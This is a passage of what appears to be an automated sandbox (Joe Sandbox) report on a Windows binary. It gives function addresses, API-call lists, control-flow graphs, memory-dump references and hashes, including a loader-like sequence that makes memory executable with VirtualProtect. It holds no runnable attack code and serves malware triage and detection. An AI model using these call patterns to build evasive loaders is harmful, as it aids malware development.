                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00D31895
                                                                                                                                                                                                • _strlen.LIBCMT ref: 00D318F7
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00D31B20
                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00D31B35
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CloseFileHandle$_strlen$CreateReadSize
                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                • API String ID: 2150716653-3887548279
                                                                                                                                                                                                • Opcode ID: a07e54a65ff7908cce3a229da904e5c97f8b5de5e4f7519b31c81f5c1e099391
                                                                                                                                                                                                • Instruction ID: c25c1068bbee61ba315d47bb7a3ccb12dd8141cb78c4cc7b777430366d39572d
                                                                                                                                                                                                • Opcode Fuzzy Hash: a07e54a65ff7908cce3a229da904e5c97f8b5de5e4f7519b31c81f5c1e099391
                                                                                                                                                                                                • Instruction Fuzzy Hash: F7A10176D012158BCB14CFB8DC85AAEFBF6FF4A350F181629E811AB351E73099418BB4
                                                                                                                                                                                                Function 00D31D30 Relevance: 18.2, APIs: 12, Instructions: 176threadCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00D31D63
                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00D31D76
                                                                                                                                                                                                  • Part of subcall function 00D3234A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D32E92
                                                                                                                                                                                                  • Part of subcall function 00D3234A: ___raise_securityfailure.LIBCMT ref: 00D32F7A
                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D31DFA
                                                                                                                                                                                                  • Part of subcall function 00D32E15: WaitForSingleObjectEx.KERNEL32(00D317D0,000000FF,00000000,?,?,?,00D31E17,?,00D317D0,00000000), ref: 00D32E21
                                                                                                                                                                                                  • Part of subcall function 00D32E15: GetExitCodeThread.KERNEL32(00D317D0,00000000,?,?,00D31E17,?,00D317D0,00000000), ref: 00D32E3A
                                                                                                                                                                                                  • Part of subcall function 00D32E15: CloseHandle.KERNEL32(00D317D0,?,?,00D31E17,?,00D317D0,00000000), ref: 00D32E4C
                                                                                                                                                                                                  • Part of subcall function 00D36F9F: CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 00D36FE8
                                                                                                                                                                                                  • Part of subcall function 00D36F9F: GetLastError.KERNEL32(?,?,?,?,00D31DD3,00000000,00000000), ref: 00D36FF4
                                                                                                                                                                                                  • Part of subcall function 00D36F9F: __dosmaperr.LIBCMT ref: 00D36FFB
                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00D31E95
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31EED
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31EFF
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F0E
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F1D
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F2C
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F3E
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F50
                                                                                                                                                                                                • std::_Throw_Cpp_error.LIBCPMT ref: 00D31F62
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFeatureFileLastNameObjectPresentProcessorSingleWait___raise_securityfailure__dosmaperr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 610485761-0
                                                                                                                                                                                                • Opcode ID: 582dce927663f06a448b650ed57942ee1e65147c458dba0af62f73c02f7b186f
                                                                                                                                                                                                • Instruction ID: fdfc683e0842685dbdf494b858ae2792aea0d86bce8980f6ba9b26d967593d77
                                                                                                                                                                                                • Opcode Fuzzy Hash: 582dce927663f06a448b650ed57942ee1e65147c458dba0af62f73c02f7b186f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 28515EF1D812199BEB10AFA4DC06BAEB7B0FF05710F041268E914773C1E7B56914CAB5
                                                                                                                                                                                                Function 00D39BBE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 138 d39bbe-d39bca 139 d39c5c-d39c5f 138->139 140 d39c65 139->140 141 d39bcf-d39be0 139->141 142 d39c67-d39c6b 140->142 143 d39be2-d39be5 141->143 144 d39bed-d39c06 LoadLibraryExW 141->144 147 d39c85-d39c87 143->147 148 d39beb 143->148 145 d39c08-d39c11 GetLastError 144->145 146 d39c6c-d39c7c 144->146 149 d39c13-d39c25 call d3cdda 145->149 150 d39c4a-d39c57 145->150 146->147 151 d39c7e-d39c7f FreeLibrary 146->151 147->142 152 d39c59 148->152 149->150 155 d39c27-d39c39 call d3cdda 149->155 150->152 151->147 152->139 155->150 158 d39c3b-d39c48 LoadLibraryExW 155->158 158->146 158->150
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,6C1E7673,?,00D39CCD,?,?,00000000), ref: 00D39C7F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                • API String ID: 3664257935-537541572
                                                                                                                                                                                                • Opcode ID: cfd09246d878bd739cde901e9e5c8a263ed7b3c1a9486c6d10628ba47a4ffb1a
                                                                                                                                                                                                • Instruction ID: 77a8dac7563193a34a1a4c9548961c6e8c2dfa909be2981ec8d201d2c452cee8
                                                                                                                                                                                                • Opcode Fuzzy Hash: cfd09246d878bd739cde901e9e5c8a263ed7b3c1a9486c6d10628ba47a4ffb1a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 19210A36A01314ABD7229F25EC95A5AB798EF42771F192130F946E7390E7B0ED00CAF0
                                                                                                                                                                                                Function 00D313F0 Relevance: 4.6, APIs: 3, Instructions: 149COMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 159 d313f0-d31428 160 d31430-d31469 159->160 160->160 161 d3146b-d31472 160->161 162 d31480-d314db 161->162 162->162 163 d314dd-d314e1 162->163 164 d314e7-d314f9 163->164 165 d31619-d3162d 163->165 166 d31500-d31547 CoResumeClassObjects KiUserExceptionDispatcher 164->166 167 d315b3-d315ff 166->167 168 d31549-d31555 call d38501 166->168 167->166 171 d31605 167->171 172 d3155a-d31567 168->172 171->165 173 d31569-d3157d call d316b0 172->173 174 d3157f-d3159e GetLastError call d316b0 172->174 179 d315a1-d315b0 call d384e6 173->179 174->179 179->167
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CoResumeClassObjects.OLE32 ref: 00D3150E
                                                                                                                                                                                                • KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00D31521
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00D31583
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassDispatcherErrorExceptionLastObjectsResumeUser
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3099690820-0
                                                                                                                                                                                                • Opcode ID: 8b52750d6d9a3aab0d3fd5ed335f7e0de2d9baf614dc8bd8a0499083ecdcea7d
                                                                                                                                                                                                • Instruction ID: 23d2cee04ff67bbff3b7db6e103314c3f285237cee133a2c7b48ede171aae269
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b52750d6d9a3aab0d3fd5ed335f7e0de2d9baf614dc8bd8a0499083ecdcea7d
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66516E748052A98BDF11CFA9D8457EEBFB0BF0A314F1841AAE845B3381C3795A05CFA5
                                                                                                                                                                                                Function 00D31710 Relevance: 4.6, APIs: 3, Instructions: 60memoryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00D31000: _strlen.LIBCMT ref: 00D3108D
                                                                                                                                                                                                • FreeConsole.KERNELBASE ref: 00D31741
                                                                                                                                                                                                  • Part of subcall function 00D313F0: CoResumeClassObjects.OLE32 ref: 00D3150E
                                                                                                                                                                                                  • Part of subcall function 00D313F0: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00D31521
                                                                                                                                                                                                • VirtualProtect.KERNELBASE(00D4E01C,00000549,00000040,?), ref: 00D31790
                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00D317C6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ClassConsoleDispatcherExceptionExitFreeObjectsProcessProtectResumeUserVirtual_strlen
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3360678313-0
                                                                                                                                                                                                • Opcode ID: 5837740b3a39578ccad0577ae67ddab4c3e4c696bdf1a431ef1d067b9af7fa37
                                                                                                                                                                                                • Instruction ID: df2317b1aaaf331e71f09741c03526af90130843b5188e1067590fcc4b1a1612
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5837740b3a39578ccad0577ae67ddab4c3e4c696bdf1a431ef1d067b9af7fa37
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E11C679E40205BBEB04AFA49C03FBE7764EB81705F444464F518EB3C2EAB1A91486F1
                                                                                                                                                                                                Function 00D36F9F Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 196 d36f9f-d36faa 197 d36fc0-d36fd3 call d37030 196->197 198 d36fac-d36fbf call d3b6de call d38016 196->198 204 d37001 197->204 205 d36fd5-d36ff2 CreateThread 197->205 208 d37003-d3700f call d37080 204->208 206 d37010-d37015 205->206 207 d36ff4-d37000 GetLastError call d3b704 205->207 212 d37017-d3701a 206->212 213 d3701c-d37020 206->213 207->204 212->213 213->208
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 00D36FE8
                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00D31DD3,00000000,00000000), ref: 00D36FF4
                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00D36FFB
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2744730728-0
                                                                                                                                                                                                • Opcode ID: 90580620b8ef540bf84c9eac27ebf99e62692fc56af8b24bb198081c6a792196
                                                                                                                                                                                                • Instruction ID: e0a7b8ddaeef82f1585df6c48aed9039564d05ee41ab69d42db89cc13bf22f8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 90580620b8ef540bf84c9eac27ebf99e62692fc56af8b24bb198081c6a792196
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A01BCB6505619AFDF2AAFA0DC06AAF3BB5EF40360F044059F80196290DB71CE00EBB0
                                                                                                                                                                                                Function 00D320C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 216 d320c0-d32115 call d32ca2 call d317d0 219 d32117-d3213d call d32d17 call d3237a 216->219
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 00D320C5
                                                                                                                                                                                                  • Part of subcall function 00D32CA2: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00D32CAE
                                                                                                                                                                                                  • Part of subcall function 00D32CA2: std::exception::exception.LIBCMT ref: 00D32CCB
                                                                                                                                                                                                  • Part of subcall function 00D32D17: GetCurrentThreadId.KERNEL32 ref: 00D32D42
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentThreadXinvalid_argumentstd::_std::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                • String ID: string too long
                                                                                                                                                                                                • API String ID: 2087764332-2556327735
                                                                                                                                                                                                • Opcode ID: dc237a981ffbff050b3c550f4f0f9f95bbff18ec2f6d0c9b356bddd158b80380
                                                                                                                                                                                                • Instruction ID: 282548380dd02dc666e0ba899fe3f001d7eeaf3ad10e3d0cae3518e0fa3cb660
                                                                                                                                                                                                • Opcode Fuzzy Hash: dc237a981ffbff050b3c550f4f0f9f95bbff18ec2f6d0c9b356bddd158b80380
                                                                                                                                                                                                • Instruction Fuzzy Hash: FD01ADB1D402099FCB04DFA4D846AEFBBB5FB45720F004239E80553740D339AA05CAF1
                                                                                                                                                                                                Function 00D3F4C2 Relevance: 3.2, APIs: 2, Instructions: 196fileCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 225 d3f4c2-d3f4e4 226 d3f6d7 225->226 227 d3f4ea-d3f4ec 225->227 230 d3f6d9-d3f6dd 226->230 228 d3f518-d3f53b 227->228 229 d3f4ee-d3f50d call d381bf 227->229 232 d3f541-d3f547 228->232 233 d3f53d-d3f53f 228->233 236 d3f510-d3f513 229->236 232->229 235 d3f549-d3f55a 232->235 233->232 233->235 237 d3f56d-d3f57d call d3f7ef 235->237 238 d3f55c-d3f56a call d42e81 235->238 236->230 243 d3f5c6-d3f5d8 237->243 244 d3f57f-d3f585 237->244 238->237 245 d3f5da-d3f5e0 243->245 246 d3f62f-d3f64f WriteFile 243->246 247 d3f587-d3f58a 244->247 248 d3f5ae-d3f5c4 call d3f86c 244->248 249 d3f5e2-d3f5e5 245->249 250 d3f61b-d3f628 call d3fc9b 245->250 253 d3f651-d3f657 GetLastError 246->253 254 d3f65a 246->254 251 d3f595-d3f5a4 call d3fc33 247->251 252 d3f58c-d3f58f 247->252 270 d3f5a7-d3f5a9 248->270 256 d3f607-d3f619 call d3fe5f 249->256 257 d3f5e7-d3f5ea 249->257 269 d3f62d 250->269 251->270 252->251 258 d3f66f-d3f672 252->258 253->254 262 d3f65d-d3f668 254->262 275 d3f602-d3f605 256->275 265 d3f675-d3f677 257->265 266 d3f5f0-d3f5fd call d3fd76 257->266 258->265 263 d3f6d2-d3f6d5 262->263 264 d3f66a-d3f66d 262->264 263->230 264->258 271 d3f6a5-d3f6b1 265->271 272 d3f679-d3f67e 265->272 266->275 269->275 270->262 278 d3f6b3-d3f6b9 271->278 279 d3f6bb-d3f6cd 271->279 276 d3f680-d3f692 272->276 277 d3f697-d3f6a0 call d3b76a 272->277 275->270 276->236 277->236 278->226 278->279 279->236
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00D3F86C: GetConsoleOutputCP.KERNEL32(6C1E7673,00000000,00000000,?), ref: 00D3F8CF
                                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D356A2,?,00D35904), ref: 00D3F647
                                                                                                                                                                                                • GetLastError.KERNEL32(?,00D356A2,?,00D35904,?,00D35904,?,?,?,?,?,?,?,00000000,?,?), ref: 00D3F651
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2915228174-0
                                                                                                                                                                                                • Opcode ID: 7fb9b70d46a19ec115de92de7555df902379f8ed46ed27bc300471cc09357047
                                                                                                                                                                                                • Instruction ID: 746c24ad3a798f654472ad8d3383a6a76a72786341ba33a0c5bd6e2756be0e48
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7fb9b70d46a19ec115de92de7555df902379f8ed46ed27bc300471cc09357047
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C6182B2D0425DAFDF11DFA8D885AAEBBB9EF09304F180165F944AB262D731D911CB70
                                                                                                                                                                                                Function 00D3234A Relevance: 3.1, APIs: 2, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 282 d3234a-d3234d 283 d3235c-d3235f call d38501 282->283 285 d32364-d32367 283->285 286 d32369-d3236a 285->286 287 d3234f-d3235a call d374be 285->287 287->283 290 d3236b-d3236f 287->290 291 d32375 290->291 292 d3248c-d324a8 call d32459 call d33f3e 290->292 293 d32e6a-d32e9a call d32c8a call d33f3e IsProcessorFeaturePresent 291->293 292->293 303 d32ea1-d32f81 call d32f82 293->303 304 d32e9c-d32e9f 293->304 304->303
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00D33F3E: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D320CA,?,?,?,00D32CC1,00D320CA,00D4D820,?,00D320CA,string too long,00D312D2), ref: 00D33F9F
                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D32E92
                                                                                                                                                                                                • ___raise_securityfailure.LIBCMT ref: 00D32F7A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001F.00000002.2704400368.0000000000D31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00D30000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001F.00000002.2703746142.0000000000D30000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2705213247.0000000000D46000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2706480899.0000000000D4E000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2707415666.0000000000D4F000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2708269704.0000000000D51000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001F.00000002.2714355102.0000000000D53000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_31_2_d30000_cad620f7d1.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionFeaturePresentProcessorRaise___raise_securityfailure
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3749517692-0
                                                                                                                                                                                                • Opcode ID: 2293be2c250b444413f2c460d14c52708020c22cc35440e0ff05b83e8fa81a39
                                                                                                                                                                                                • Instruction ID: 31ab43475550024c8f753da2d2fac7ff8190f9cd732a5f2ad3bd3c410f325908
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2293be2c250b444413f2c460d14c52708020c22cc35440e0ff05b83e8fa81a39
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A3159BC900305AFC700DF54FD86A557BA8FB06314F20853AE914C63B1E7B09A458BB8
                                                                                                                                                                                                Function 00D3FC9B Relevance: 3.1, APIs: 2, Instructions: 80fileCOMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                control_flow_graph 307 d3fc9b-d3fcf0 call d43140 310 d3fcf2 307->310 311 d3fd65-d3fd75 call d323be 307->311 313 d3fcf8 310->313 315 d3fcfe-d3fd00 313->315 316 d3fd02-d3fd07 315->316 317 d3fd1a-d3fd3f WriteFile 315->317 320 d3fd10-d3fd18 316->320 321 d3fd09-d3fd0f 316->321 318 d3fd41-d3fd4c 317->318 319 d3fd5d-d3fd63 GetLastError 317->319 318->311 322 d3fd4e-d3fd59 318->322 319->311 320->315 320->317 321->320 322->313 323 d3fd5b 322->323 323->311
                                                                                                                                                                                                APIs
